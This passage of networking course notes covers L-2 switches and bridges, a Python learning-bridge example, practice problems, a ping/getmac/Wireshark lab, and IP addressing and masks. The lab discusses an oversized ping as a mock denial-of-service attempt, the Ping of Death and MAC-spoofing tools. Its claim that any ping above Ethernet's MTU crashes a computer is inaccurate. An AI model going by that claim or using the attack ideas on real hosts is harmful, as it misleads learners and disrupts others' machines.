Look at Scenario 3 above, which shows 12 users on a 4-port bridge. In this case the 12 users are divided into four collision domains, with three users (and a bridge port) within each collision domain.
What would happen if we had the 12 users on a 12-port bridge? In this case each user would be in his own collision domain (sharing it only with the bridge).
An N-port bridge that serves a number of hosts ≤ N is referred to as a "Layer-2 switch" or an "L-2 switch".
Consider the scenario depicted below, which shows 7 users connected to a 9-port bridge. From here on out, whenever the
number of users is less than or equal to the number of ports (as is the case here), we will use the term Layer-2 switch, or simply
switch, instead of the term bridge.
Do collisions still occur? The answer is Yes, but only between a user and the switch. In the scenario above, all hosts can
successfully transmit at the same time since each port is now a separate collision domain.
Note that L-2 switches, like bridges, look at frame addresses, and operate at the data link layer. While many people use the
two terms interchangeably, a switch is most often used to connect individual computers, whereas bridges usually connect
LANs. Thus, in this taxonomy, with L-2 switches each computer is in its own collision domain, whereas with bridges each
connected LAN forms a collision domain.
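An added example, not from the notes, of the forwarding decision a learning bridge or L-2 switch makes for each arriving frame, as described in sections 2 and 3: it records which port each source address was seen on, floods frames to unknown or broadcast destinations, sends known destinations out one port, and drops frames whose destination sits on the LAN they arrived from. The Ethernet addresses, the `mac()` helper and the class name are constructed for this example; `per_user_bandwidth` is the back-of-the-envelope rule from the notes, counting a bridge port as one more user of the collision domain.

```python
BROADCAST = "FF:FF:FF:FF:FF:FF"


def mac(n):
    """Constructed locally-administered address for 'Host n' (not a real vendor prefix)."""
    return f"02:00:00:00:00:{n:02X}"


class LearningBridge:
    """A transparent bridge (or L-2 switch) with `ports` numbered ports.

    Hosts are identified by their Ethernet address strings. The bridge learns which
    port each source address lives behind and uses that table to decide whether to
    forward, flood or drop each arriving frame."""

    def __init__(self, ports):
        if ports < 2:
            raise ValueError("a bridge needs at least two ports")
        self.ports = ports
        self.table = {}          # Ethernet address -> port it was last seen on

    def receive(self, in_port, src, dst):
        """Handle one frame arriving on `in_port`; return the set of ports it goes out on."""
        if not 0 <= in_port < self.ports:
            raise ValueError(f"no such port: {in_port}")
        self.table[src] = in_port            # backward learning from the source address
        others = {p for p in range(self.ports) if p != in_port}
        if dst == BROADCAST or dst not in self.table:
            return others                    # broadcast or unknown destination: flood
        out = self.table[dst]
        if out == in_port:
            return set()                     # destination already heard it on its own LAN
        return {out}                         # forward on exactly one port


def per_user_bandwidth(total_bw, hosts_in_domain, bridge_ports=1):
    """Back-of-the-envelope figure from the notes: every host plus every bridge port on
    the segment is treated as one equal sharer of the collision domain's capacity."""
    return total_bw / (hosts_in_domain + bridge_ports)


def bridged_lans_demo():
    """The scenario in the notes: Hosts 1-6 on the left LAN (port 0) and Hosts 9-14 on
    the right LAN (port 1). Returns the bridge's forwarding decisions in order."""
    bridge = LearningBridge(ports=2)
    port_of = {mac(n): 0 for n in range(1, 7)}
    port_of.update({mac(n): 1 for n in range(9, 15)})
    decisions = []
    # Host 5 broadcasts first, so the bridge learns which LAN Host 5 is on.
    decisions.append(bridge.receive(port_of[mac(5)], mac(5), BROADCAST))
    # Host 3 -> Host 5: same LAN, so nothing crosses the bridge.
    decisions.append(bridge.receive(port_of[mac(3)], mac(3), mac(5)))
    # Host 3 -> Host 12: not yet learned, so the frame is flooded to the right LAN.
    decisions.append(bridge.receive(port_of[mac(3)], mac(3), mac(12)))
    # Host 12 replies: Host 3 is known, so the frame goes to port 0 only.
    decisions.append(bridge.receive(port_of[mac(12)], mac(12), mac(3)))
    return decisions
```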
Practice Problem 12.13
You have set up an Ethernet LAN for 10 users. For simplicity, assume the network has an efficiency of 100% and that resources
are shared equally among users. How much bandwidth is available to each user if:
(a) The 10 users are connected on a 10 Mbps Ethernet to a hub.
(b) The 10 users are connected on a 10 Mbps switched Ethernet
Solution:
(a)
(b)
Practice Problem 12.14
You want to set up an Ethernet LAN for a group of 10 offices at the Pentagon. Each office requires 2 digital telephone lines
(64 kbps each). Additionally, each office must support a peak web browsing demand of 40,000 bytes/min.
(a) What is the total bit rate demand of the LAN?
(b) Would a standard 10 Mbps Ethernet suffice?
Solution:
(a)
(b)
Practice Problem 12.15
Match the column on the left with the description on the right:
Network Interface Card
(a) Looks at MAC address and then forwards the frame on the correct port
Hub
(b) Copies incoming bits to all other ports
Switch
(c) Piece of equipment with a unique address that translates bits to signals and
transmits the signals on the medium.
Practice Problem 12.16
If an entire IP packet has 8096 bytes, how many Ethernet frames are required to transmit this packet?
Solution:
Practice Problem 12.17
Answer True or False to the following statements:
(a) An Ethernet address is normally expressed in decimal.
(b) An Ethernet address is burned into hardware and never changes
(c) An Ethernet address is used at the network layer to address packets.
(d) An Ethernet address, MAC address, and Hardware address are all the same thing.
(e) When I log on to different networks my Ethernet Address can change every time.
An Aside
Fast Ethernet (1995)
Fast Ethernet uses the same frame format as "standard Ethernet", i.e., it still uses 48-bit data link addresses and uses the same frame fields as shown on page 314 of these notes.
Fast Ethernet is backward-compatible with standard Ethernet. And, perhaps surprisingly, it uses the same minimum and maximum frame lengths as standard Ethernet. Also, it has the same maximum physical length as standard Ethernet (100 meters for UTP). There is a big difference: Fast Ethernet operates at 100 Mbps.
So…how do we raise the data rate? The details are rather technical, and have to do with the improvements in technology over the years. The original Ethernet operates at 10 Mbps, but required a special type of signaling called Manchester encoding. Advances in transmission media allowed for a signaling scheme that supported higher data rates. Better clock circuitry allowed us to raise the transmission speed without worrying about loss of synchronization. Instead of using one twisted pair, we use four twisted pairs: 1 to the switch, 1 from the switch, and 2 that are switchable to support the current direction of traffic flow.
TWISTED PAIR 1: Always to the network
TWISTED PAIR 2: Always from the network
TWISTED PAIR 3 and TWISTED PAIR 4: Can be switched from one direction to the other, to support the current desired direction of traffic flow
Finally, 3-level signaling is used at the physical layer. Instead of sending a 0 or 1, we can send 0, -1 or +1.
Problems
1. What are the advantages of dividing an Ethernet LAN with a bridge?
2. What is the relationship between a switch and a bridge?
3. Suppose the Ethernet data link layer receives 42 bytes of data from the network layer. How many bytes of padding must be added to the data?
4. What is the ratio of useful data to the entire packet for the smallest Ethernet frame?
5. Suppose we have a standard 10 Mbps Ethernet LAN, on which the average frame size is 1000 bytes. If a noise burst of 2 msec occurs on the LAN, how many frames are destroyed?
6. Sketch the Ethernet packet required to send the text string "Hello World" from Alice (whose MAC address is 11:22:33:44:55:66) to Bob (whose MAC address is AA:BB:CC:DD:EE:FF). Your error correction bits are 0101 1100 1010 1010 1111 1110 1011 1101. Assume that any padding bytes consist of all-zeroes, and that the Length/Type field is used as a Length field. You do not need to show the bytes added by the physical layer. RECALL: ALL VALUES ARE REPRESENTED IN HEXADECIMAL!
7. Consider the network below, which shows four 10 Mbps LANs connected by two bridges, labeled B1 and B2. Assume all users (labeled 1 through 7) are very chatty and equally chatty.
[Figure: LAN 1 through LAN 4 joined by bridges B1 and B2, with users 1 through 7]
(a) What is the effective data rate seen by user 4?
(b) What is the effective data rate seen by user 5?
(c) What is the effective data rate seen by user 6?
(d) What is the effective data rate seen by user 6 if the two bridges are replaced with hubs?
8. Two standard (10 Mbps) Ethernet topologies are illustrated in Figure 1 and Figure 2 for a network consisting of six computers.
[Figure 1]
[Figure 2]
(a) How much bandwidth does each user get for the network topology depicted in Figure 1?
(b) How much bandwidth does each user get for the network topology depicted in Figure 2?
(c) How much bandwidth would each user get if a switch was used to connect together the six computers in my network?
Security Exercise 12
Part 1. Your Ethernet Address
A computer is connected to a network by a Network Interface Card (NIC), also termed a network adapter. That is, the NIC is
the physical interface between a computer and the networking medium. The networking medium, in turn, might be a wire, a
fiber optic strand, or free space (in the case of wireless networks).
Each NIC is assigned a globally unique address burned into the card's Read Only Memory. All machines on an Ethernet LAN
are guaranteed to have unique addresses. No two Ethernet users anywhere in the world can have the same global address.
Addresses are 6 bytes, of which 46 bits are used for the unique address.
The NIC interfaces with the physical media, so this globally-unique address is often called the physical address. Since physical
devices are often termed hardware, a NIC’s unique address is also frequently referred to as a hardware address. Finally, since
the NIC controls access between the computer and the networking media, its address is also termed a Media Access Control
(MAC) address. Since most NICs conform to the Ethernet standard, the NIC address is also called an Ethernet address. Thus,
the NIC address goes by four different names which are often used interchangeably:
• Physical Address
• Hardware Address
• MAC Address
• Ethernet Address
In Windows, open a command prompt. (To open a command prompt, click the Start button, type cmd in the search box, and press Enter.)
At the command prompt, type: getmac /v
Question 1.
Ignoring VMware virtual adapters and Wi-Fi, what is your computer's Ethernet address?
Recall that a MAC address is 48-bits. The first 3 bytes provide the address of the NIC manufacturer (or vendor). The Institute
of Electrical and Electronics Engineers (IEEE) assigns blocks of addresses to various manufacturers. For a listing of vendor
codes, see
http://standards.ieee.org/develop/regauth/oui/oui.txt
Question 2.
What vendor manufactured your Ethernet card?
Question 3.
Ward Hall has a policy that midshipmen can only connect their original issued computers to the USNA network. Suppose you go to Best Buy, buy a new computer and connect it to the network. Will Ward Hall be able to tell? If so, how?
Can you "spoof" your MAC address—i.e., have your computer tell the rest of the world your MAC address is different from
the actual value burned into ROM? The answer is: Yes, it is very easy to spoof your MAC address—it requires a change to one
line of the easy-to-edit Windows registry. However, you should not do this since even a small screw-up while editing the
Windows registry can irreparably damage your computer. Bottom line, unless you are a CS major with a 4.0 QPR and ten
computers (so you have a few to spare), you should never edit the Windows registry.
[Cartoon dialogue]
"But, can't I download freeware (for example, Technitium) or buy inexpensive products (like SMAC) that will correctly do this registry change for me? And, oh, by the way: Who am I?"
"You can do this, but the ITSD User Agreement that you have signed in blood forbids it. So, if you download this software you will be fried. Don't do it!"
"That wouldn't have stopped me!"
"Don't listen to him midshipman! Times have changed since 1958! You will be fried! DON'T DO IT!!!"
"Chicken!"
Part 2. Using ping to Determine the Largest Possible Ethernet Frame Size
ping is a tool that can be used to determine whether our computer can reach another computer across the Internet. From the
Windows command prompt, type
ping www.cnn.com
You should see something similar to:
C:> ping www.espn.com
Pinging www.espn.com [199.181.132.250] with 32 bytes of data:
Reply from 199.181.132.250: bytes=32 time=74ms TTL=233
Reply from 199.181.132.250: bytes=32 time=84ms TTL=233
Reply from 199.181.132.250: bytes=32 time=76ms TTL=233
Reply from 199.181.132.250: bytes=32 time=75ms TTL=233
Ping statistics for 199.181.132.250:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 74ms, Maximum = 84ms, Average = 77ms
ping is a probing tool that sends a packet from our computer to the designated target computer (in this case, the computer
with the name www.espn.com) and waits for a reply. The output above tells us several things:
• our ping packet contains 32 bytes of data (it also happens to contain another 28 bytes of header information).
• we conducted a total of 4 probes.
• we received replies to all four of our probes.
• the round trip times for our four probes were 74, 84, 76 and 75 milliseconds.
Looking at the ping reply above, notice that www.espn.com is also referred to as “199.181.132.250.” This latter sequence
of four numbers (separated by decimals) is, as you might already know, the computer’s IP address. Thus, the computer named
www.espn.com has IP address 199.181.132.250. We will discuss IP addresses in the next lecture.
When we use the ping command, we, by default, ping the target host with 32 bytes of data. We can change the size of the ping
packet by using the -l option. For example, if I type
ping -l 100 www.cnn.com
I will see something along these lines (but note that IP addresses can and do vary over time):
Pinging www.espn.com [199.181.132.250] with 100 bytes of data:
Reply from 199.181.132.250: bytes=100 time=75ms TTL=233
Reply from 199.181.132.250: bytes=100 time=75ms TTL=233
Reply from 199.181.132.250: bytes=100 time=74ms TTL=233
Reply from 199.181.132.250: bytes=100 time=74ms TTL=233
Ping statistics for 199.181.132.250:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 74ms, Maximum = 75ms, Average = 74ms
Notice that I pinged www.espn.com with 100 bytes of data. If I had typed
ping -l 150 www.cnn.com
I would have pinged with 150 bytes of data.
Hmmm... I wonder what would happen if I tried to ping www.espn.com with a very large packet. This would mean that the
computer would have to stop for a long time and deal with my request. So, the services of www.espn.com would be then
be denied to others. I might just call this an attack...hmmm...a denial of service attack ...yea, that’s the ticket. I try to ping
with 50,000 bytes by typing:
ping -l 50000 www.cnn.com
and I see:
Pinging www.espn.com [199.181.132.250] with 50000 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Ping statistics for 199.181.132.250:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Gasp! My plans for world domination are foiled! The target rejected my ping packets!
Why? Well, Ethernet, which is the local area network technology used by just about everyone (including us!) will only allow
the data packet to be at most a certain size. This maximum size is called the Maximum Transfer Unit (MTU). Well…what if
we want to send a block of data bigger than Ethernet’s MTU? In general, there is no problem with this; the large block of data
is broken (i.e., fragmented) into pieces (each of which is less than or equal to Ethernet’s MTU), and these pieces are then sent
individually. The pieces (fragments) are then put back together when they all arrive at the destination.
In general, there is no hitch, except for one wrinkle: hosts will often ignore ping packets that were fragmented. Why, you ask?
Well, in the mid 1990’s, it was discovered that if a ping packet was fragmented, it could be forced back together at the
destination in such a way that the final size of the reconstituted packet was larger than the maximum permissible IP packet size,
causing the host’s operating system to crash. This scenario was given the somewhat unpleasant name: The Ping of Death.
The Bottom Line: You can crash someone's computer if you send them a ping that is so large that it cannot fit in one Ethernet
frame, i.e., you can crash someone's computer if you send them a ping that exceeds Ethernet's MTU. Most operating systems
are on to this behavior, and will not permit reception of a fragmented ping.
In summary, if you send a very large ping packet, it will need to be fragmented to fit inside Ethernet’s MTU, but these fragments
will then be ignored by the destination since there is no good reason someone should want to send me a ping packet that was
so big that it had to be fragmented.
What is Ethernet’s Maximum Transfer Unit?
What is the largest block of data that Ethernet will allow me to send without requiring fragmentation? To see, we can use the -f option in the ping command. This option will mean that the packet will not be fragmented, so, if the packet is bigger than Ethernet's MTU, it won't be sent. For example, if I type
ping -f -l 50000 www.cnn.com
I am told that the packet needs to be fragmented, but the packet will not be fragmented because the 'don't fragment' option (-f) has been used.
Question 4. What is the Ethernet’s MTU? Note that whatever number seems to work for ping, you must add 28 to it,
since the ping data has 28 bytes of header information tacked onto it.
Question 5. After you have completed Question 4, review the notes where we discussed the maximum size of an
Ethernet frame. Does your answer to Question 4 match what the notes say is the maximum amount of data that can
fit inside the data field of an Ethernet frame?
Part 3. Wireshark
Spurred by the Snowden revelations, The Guardian published an article titled "The NSA is turning the Internet into a total
surveillance system." Others speculate that the NSA may be monitoring essentially all Internet traffic. Concerning the NSA's
surveillance of Internet traffic, security expert Brian Reid opined that "This isn’t a wiretap, it’s a country-tap.”
Our objective today is not to examine why such surveillance is done, but rather to gain a sense of how such surveillance is done.
Toward that end, we will gain basic familiarity with a packet sniffer named Wireshark. A packet sniffer is, in essence, a
wiretap that allows you to monitor the traffic passing a particular point in a computer network. A packet sniffer not only allows
you to analyze or inspect individual packets as binary or hexadecimal symbols, but also attempts, where possible, to convert
binary packets into a human-readable format.
Packet sniffers allow the user to determine who is communicating with whom, and what they are saying, topics of great concern
to network security specialists and the people who keep them busy.
Packet sniffing, as with most things, can be used for good purposes or for malicious purposes. A hacker can certainly use a
packet sniffer to detect who is communicating with whom, and the nature of the communication (so-called metadata). Any
unencrypted content (to include unencrypted passwords) can also be read. The NSA uses packet sniffers to thwart terrorist
plots. In June 2013 General Keith Alexander, the Director of the NSA, testified that the NSA's surveillance programs had
foiled at least 50 terrorist attacks worldwide.
Computer engineers use packet sniffers for good purposes also: A network can be analyzed to determine if there is excessive
congestion, troubleshooting of faults can be facilitated, unauthorized network users can be detected, etc.
A. Getting Started
Wireshark is a packet sniffer that will capture packets and display them using a nice Graphical User Interface (GUI). Wireshark
is a passive program; it does not transmit packets onto the network. It merely analyzes what traffic is going past your NIC. (By
default it puts the NIC into promiscuous mode so that frames addressed to other machines are captured too; on a switched
network you will still only see what the switch sends to your port, plus broadcasts.)
Start up VMware Workstation and power-on your Cyber2 VM. Then launch Wireshark by selecting:
Applications > Internet > Wireshark (as root)
Under File, click Open, highlight the file named packets, and then hit Open.
Now, after opening the file you should see something much more interesting. (If your display looks slightly different from that
shown on the next page, don’t worry. If it looks radically different, let the instructor know.)
[Figure: the Wireshark window with its three panes labeled: Packet List Pane (top), Packet Details Pane (middle), Packet Bytes Pane (bottom).]
This shows you all the packets that were in the file that was provided. Three pains...I mean panes...are provided. Referring to
the figure above, we see the
• Packet List Pane: This displays a summary of each packet captured. Each line represents a packet. You can see that
the packets are numbered—Number 1, Number 2, etc. (This pane presents so-called metadata. From metadata we
can determine such things as: Who is initiating the communication? Who is the intended recipient? What is the overall
goal of the communication—is it an attempt to access a web site? Is it an attempt to send an email? Is it a file transfer?)
By clicking on a packet in this pane, you control what is displayed in the two lower panes. In the figure above, the
first line (Packet 1) is highlighted in green, and the two other panes give details about this packet.
• Packet Details Pane: Displays more details about the packet that you highlighted in the Packet List Pane.
• Packet Bytes Pane: Displays the gory details of the packet selected in the Packet List Pane, and highlights the field
selected in the Packet Details Pane. Whereas the top pane reveals the metadata, this pane reveals all of the contents.
Take a moment to memorize the names of these three panes, so that when you see, for instance, “Packet Details Pane” you
don’t have to think: Which one was that again?
Okay, let’s look at the Packet List Pane (which one was that again?).
At the top of the Packet List Pane, starting at the left, we have the number (No.) column. As mentioned, each packet that was
captured is sequentially numbered by Wireshark.
Question 6. How many packets were captured?
Next over, we have the Time column. By default, this column indicates the relative time that each packet was received, with
the first packet arriving at t = 0.
Question 7. What is the number of the packet that was received 10 seconds into this trace?
Let’s look at packet 5182. Look at the Packet Details pane for this packet:
This shows the protocols used by this packet. So, for instance, we see that this packet used Ethernet, The Internet Protocol (IP)
and the Transmission Control Protocol (TCP). By clicking on the plus sign we can expand and collapse each of the listed
protocols.
The bottom pane, the Packet Bytes Pane, shows the data in the selected packet (in this case, packet 5182) in hexadecimal.
Now, let’s look at the Ethernet protocol in more detail. Click the arrow next to Ethernet and you should see this:
Question 8.
Look at the first 12 hexadecimal digits (six bytes) in the Packet Bytes Pane. They read:
00 01 02 c6 3b 6a
This is the very start of the Ethernet frame. Referring to the Ethernet frame format from your notes,
what is the meaning of these six bytes?
Question 9.
Look at the next 12 hexadecimal digits (six bytes) in the Packet Bytes Pane. They read:
00 04 80 74 09 00
This is the next part of the Ethernet frame. Referring to the Ethernet frame format from your notes,
what is the meaning of these six bytes?
Question 10.
Do your answers for Questions 8 and 9 match the info provided in the middle pane?
Question 11.
Can Wireshark be used to determine the NIC card numbers of people using the network?
Question 12.
Look at the next four hexadecimal digits (two bytes) in the Packet Bytes Pane. They read:
08 00
Referring to the Ethernet frame format from your notes, what is the meaning of these two bytes?
Question 13.
Go to the website: http://www.cavebear.com/archive/cavebear/Ethernet/type.html
What type of information is carried in the data field of this Ethernet frame?
Look at packet number 2.
Question 14. What destination hardware address was used in this frame? What is the meaning of that value for the
destination address?
Security Exercise 12 Answer Sheet
Name:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Question 10:
Question 11:
Question 12:
Question 13:
Question 14:
Chapter 13: Internet Protocol
Objectives:
(a) Summarize the principles behind the design of the Internet Protocol.
(b) Define the structure of an IP address and define the purpose of network masking.
(c) Determine the address space available given an IP address and mask.
(d) Identify and explain the basic fields of the IP header.
(e) Understand the current use of the IP address space.
I. The Problem and the Solution
1. The Problem. As computer networking took off in the 1970's, many different competing companies developed many
different network architectures, each using different protocols at each layer. Each company advertised its own approach as
"the best." This explosion of different approaches was beneficial in that it fostered competition, with each company vying to
make their own network architecture better. But, all the while, this presented a problem when people on different networks
wanted to connect to each other.
Originally, computers could only talk to other computers on the same network—but, at the same time, there was a strong desire
to allow any two computers on any two networks to be able to communicate. This seemed infeasible: Different networks have
different frame formats at the data link layer, different physical layer characteristics, different addressing schemes, etc.
Consider the internet shown below, which consists of a token ring (RIP), an Ethernet network and an IBM network (RIP)
connected together. Each of these networks uses different frame formats, as shown. Could we just plop an Ethernet frame on
a token ring network or an SNA network and have it work?
[Figure: data-link frame formats for the three networks. Token ring (Leon-Garcia & Widjaja, Communication Networks, Figure 6.61),
token frame and data frame formats: SD (1 byte), AC (1), FC (1), Destination Address (2 or 6), Source Address (2 or 6), Information,
FCS (4), ED (1), FS (1). SD = starting delimiter (J K 0 J K 0 0 0; J, K non-data symbols); AC = access control (PPP priority bits,
T token bit, M monitor bit, RRR reservation bits); FC = frame control (FF frame type, ZZZZZZ control bits); ED = ending delimiter
(J K 1 J K 1 I E; I intermediate-frame bit, E error-detection bit); FS = frame status (A C x x A C x x; A address-recognized bit,
C frame-copied bit, xx undefined). Ethernet: Figure 13.4, 802.3 MAC frame (copyright 2000 The McGraw Hill Companies).
IBM SNA: High-Level Data Link Control (HDLC) frame format for bit-oriented protocols.]
The answer is, of course: No. The frame formats on one network will be completely unrecognizable on a different network!
For example, with Ethernet, the destination address occurs starting on the 9th byte into the frame. In token ring, the destination
address starts with the 4th byte into the frame. In SNA, the destination address occurs on the 2nd byte into the frame.
As another example, in Ethernet the data starts 23 bytes into the frame, in token ring the data starts either 7 or 15 bytes into the
frame, and for SNA the data starts 3 bytes into the frame. A frame from one network will look like garbage on a different
network.
Note that, aside from the frame format, different networks have “structural” differences also. For example, Ethernet carries at
most 1500 bytes of data in a frame, token ring has a maximum frame size of 5000 bytes and SNA has no maximum frame size.
Consider also: Ethernet addresses are always 6 bytes. Token ring addresses can be 2 or 6 bytes, and SNA addresses are 1 byte.
And, furthermore, we’ve shown only three networks connected above. Throw in an ATM network, a Token Bus network,
some Novell and AppleTalk networks, an FDDI optical network and a couple of wireless LANs and things go to hell in a handbasket.
To summarize, then, we need protocols that can implement internetworking, i.e., we need protocols that can overcome the
differences in networks. These protocols should "conceal" the underlying network differences so that users are unaware that
different networks even exist. From the user's perspective, everyone should be on one monolithic network.
2. The Solution: The Kahn/Cerf Protocols
A revolutionary solution to the internetworking problem was proposed in the early 70's by Vinton Cerf and Robert Kahn. The
two protocols they proposed, later christened the Internet Protocol (IP) and the Transmission Control Protocol (TCP) quickly
became the most popular suite of protocols for internetworking and were subsequently adopted as the protocols used by the
Internet.
[Photos: Vinton Cerf; Robert Kahn; Cerf and Kahn with President Bush.]
If the award of the Presidential Medal of Freedom does not convince you of the importance of these protocols, perhaps this
will: These protocols are so damn famous that one of the authors was once invited to give a talk to fascinated midshipmen:
These two protocols—IP and TCP—are truly a work of genius. These protocols were intended to allow internetworking for
small networks (in 1975 the Internet had a mere 61 nodes). These protocols have successfully scaled to support networks of
billions of users. It is estimated that two billion videos are watched on YouTube each day. Trillions of emails are sent each
year. Think about all the things you use the Internet for—and then think that it all works because of protocols that were
designed in 1975 for a small system, and never intended to scale to large networks.
Stated another way: It is amazing that the Internet actually works at all!
However, the fact that the Internet uses protocols originally designed to be used on a small network of academics means that
security was never baked into the cake. Security was not needed on a network of 61 nodes, all of whom were friends. With
one billion nodes on the network today, well… things are different.
3. The Premises. Kahn and Cerf reasoned that for internetworking to be efficient, everyone must agree on three things:
• A standard for service
• A global addressing scheme
• A uniform packet format
Regarding the first item above—the standard for service—IP provides connectionless unreliable best-effort packet delivery.
• Connectionless: Every packet is an independent entity, possibly traveling over different paths from source to
destination. Stated another way, there is no network connection that is set up in advance along which all packets will
subsequently flow from source to destination.
• Unreliable: Packets can be lost, delivered out of order, or delivered multiple times; IP will not detect this.
• Best-effort: There are no guarantees packet delivery will be successful. Basically, IP says: "I'll try, but no guarantees."
The standard of service provided by IP can be likened to the Post Office. To see this, suppose that you mail three letters to
your family back in Los Angeles, California. Each letter is mailed from the same location in Bancroft Hall. You mail Letter
#1 on Monday, Letter #2 on Tuesday and Letter #3 on Wednesday.
It is quite possible that the letters follow different routes from Annapolis to Los Angeles. For instance, two of the letters might
be delivered on a direct flight, while the third might be placed in a bag that has to change planes in Chicago. Letter delivery is
connectionless.
It is quite possible that your family receives the letters out of order, perhaps receiving Letter 3 before Letter 2. One of your
letters might never be delivered—the Post Office estimates that slightly over 1% of mail is never delivered to the destination
(for varying reasons). Letter delivery is unreliable.
Unless you pay a premium, there are no guarantees that a letter you place in the mail will actually be delivered. Letter delivery
is provided on a best-effort basis.
We now address the other two requirements for internetworking. The global addressing scheme will be discussed in Section
II below, and the uniform packet format will be discussed in Section III.
II. The IP Address
1. A Software Address: To make a group of networks "appear" to be a single network, we must use a single global addressing
scheme for all hosts on all networks. IP assigns to each computer a unique 32-bit IP address.
This is a "software address"; it is not a hardware address. To send a packet over a TCP/IP network, we must use the
destination's IP address.
IP addresses have two parts: a Network ID, which is the same for all hosts on a particular network, and a Host ID, which is a
unique suffix for each individual host on this particular network.
  Network ID: same for all computers on a particular network  |  Host ID: unique suffix for each individual computer on this particular network
2. Dotted Decimal Notation for Reading IP addresses. Let's momentarily gloss over the separation of the IP address into a
Network ID and a Host ID, and simply focus on how the 32-bit address is represented. For historical reasons, IP addresses are
expressed as decimal numbers (as opposed to a more sensible hexadecimal scheme).
The 32-bit IP address is separated into four 8-bit chunks (octets). Each octet is then expressed as a decimal value, separated
by periods. This is termed the dotted-decimal notation for IP addresses.
For example, to express the IP address 10000001000010010100000111001111 in dotted decimal notation, it is first
split into four octets:
10000001 00001001 01000001 11001111
and the four octets are each individually converted to a decimal (base-10) number:
10000001 = 129    00001001 = 9    01000001 = 65    11001111 = 207
We then write the four decimal numbers separated by periods: the IP address is 129.9.65.207.
Practice Problem 13.1
Express each of the following IP addresses in dotted-decimal notation.
(a) 00001011 00000010 00000000 00100111
(b) 10000000 10000000 11111111 00000000
Solution:
(a)
(b)
Every computer on the Internet must have a unique IP address. That is, no two devices on the Internet can have the same IP
address at the same time. In theory, since IP addresses are 32 bits, we have 2^32 (more than 4 billion) IP addresses available.
Thus, in theory, more than 4 billion devices could be simultaneously connected to the Internet.
3. The Network Mask Now, let's revisit the notion that the 32 bits in an IP address are divided into a Network ID and a Host
ID. To view the Network ID portion of an IP address, we use a network mask. A network mask (which we will just call a
mask, since the context is understood) is a 32-bit number consisting of a string of contiguous 1’s followed by contiguous 0’s.
Practice Problem 13.2
Which of the following can serve as masks?
(a) 255.2.0.0
(b) 255.255.0.0
(c) 255.255.0.23
(d) 255.255.64.0
Solution:
(a)
(b)
(c)
(d)
Practice Problem 13.3
Show that the address 255.240.0.0 is a mask by writing out the address as 32 bits.
Solution:
Since masks always have the same form (a string of ones followed by a string of zeroes), they lend themselves to an easy
shorthand notation. We can write a mask as /n where n is the number of ones. This is called “slash notation” or CIDR notation.
The acronym CIDR stands for Classless Inter-Domain Routing.[23]
Practice Problem 13.4
Write the following masks in slash notation.
(a) 255.0.0.0
(b) 255.255.255.0
(c) 255.240.0.0
Solution: (a)
(b)
(c)
Practice Problem 13.5
Write the following masks in dotted decimal notation.
(a) /16
(b) /9
Solution: (a)
(b)
4. Use of Masks
Recall that IP addresses have two parts.
Network ID
Host ID
We design masks so that if we bitwise AND the mask with an IP address, we extract the network ID.
For example, suppose we are examining a Navy site that is using a mask of /17. Suppose we see that a host on this network
has the IP address: 131.122.220.30. What is the network ID?
To solve this problem, we first express the mask as a 32-bit IP address:
1 1 1 1 1 1 1 1 . 1 1 1 1 1 1 1 1 . 1 0 0 0 0 0 0 0 . 0 0 0 0 0 0 0 0
We then express the IP address as a 32-bit quantity:
1 0 0 0 0 0 1 1 . 0 1 1 1 1 0 1 0 . 1 1 0 1 1 1 0 0 . 0 0 0 1 1 1 1 0
We then bitwise AND the mask with the IP address. Recall the table for the bitwise AND operation:
  A   B   A AND B
  0   0   0
  0   1   0
  1   0   0
  1   1   1
mask     1 1 1 1 1 1 1 1 . 1 1 1 1 1 1 1 1 . 1 0 0 0 0 0 0 0 . 0 0 0 0 0 0 0 0
IP add   1 0 0 0 0 0 1 1 . 0 1 1 1 1 0 1 0 . 1 1 0 1 1 1 0 0 . 0 0 0 1 1 1 1 0
         -----------------------------------------------------------------
Net add  1 0 0 0 0 0 1 1 . 0 1 1 1 1 0 1 0 . 1 0 0 0 0 0 0 0 . 0 0 0 0 0 0 0 0
[23] This is pronounced "cider", like "apple cider".
Now, converting the result to dotted decimal notation, we have the network ID: 131.122.128.0
Recall the significance of this network address and the mask: Since the mask was given as /17, every host on this network will
have the same first 17 bits in common. The network ID—131.122.128.0—specifies the exact values of these first 17 bits.
Thus, every host on this network has an IP address that begins:
1 0 0 0 0 0 1 1 . 0 1 1 1 1 0 1 0 . 1 ...
The remaining bits (shown as the three dots above) are used to constitute the host ID.
Practice Problem 13.6
Suppose an organization has been given a mask /24. One of its machines has IP address 200.137.34.56. What is the
network ID?
Solution:
Practice Problem 13.7
Suppose an organization has been given a mask /13. One of its machines has IP address 200.137.34.56. What is the
network ID?
Solution:
5. Obtaining an IP Address Each host on the Internet must have a unique IP address. It would be very bad for two (or
more) people to have the same IP address. This latter (bad) event is termed an address conflict. So, we must ensure there are
no address conflicts.
When an organization needs IP addresses, it is given a block of addresses. So… how does an organization get a block of IP
addresses to dole out to its hosts?
To ensure there are no address conflicts, (i.e., to ensure uniqueness) an organization—the Internet Assigned Numbers Authority
(IANA)—gives out network addresses. IANA has authorized five sub-organizations, termed Regional Internet Registries (RIRs),
to control large blocks of addresses and distribute them to organizations in different geographic regions of the world. The
Regional Internet Registry covering the United States and Canada is ARIN (which stands for American Registry for Internet
Numbers).
Generally, ordinary organizations do not interact with ARIN. Usually, ISPs get a large number of addresses from ARIN, and
organizations, in turn, get blocks of addresses from their ISP. So, the authority is:
[Figure 2. Internet authority hierarchy. At the top, ICANN/IANA ultimately controls all IP addresses. Below it are the five
Regional Internet Registries that IANA has authorized to administer blocks of addresses: ARIN, RIPE (RIPE = Réseaux IP
Européens), APNIC, LACNIC and AFRINIC. Below the registries are the ISPs (ISP 1, ISP 2, … ISP 16, …), and below the ISPs
the end organizations (Joe’s Hardware, Sal’s Pizza, USNA, …).]
So…bottom line…when an organization needs IP addresses, it is given a network address (usually from an ISP). The
organization then uses the remaining bits in the IP address (corresponding to the host bits) to distribute unique IP addresses to
its hosts.
An Aside
Believe it or not, from the inception of the Internet until late 1998, a single individual
manually assigned all IP addresses. The individual, Jon Postel, was termed by many as the
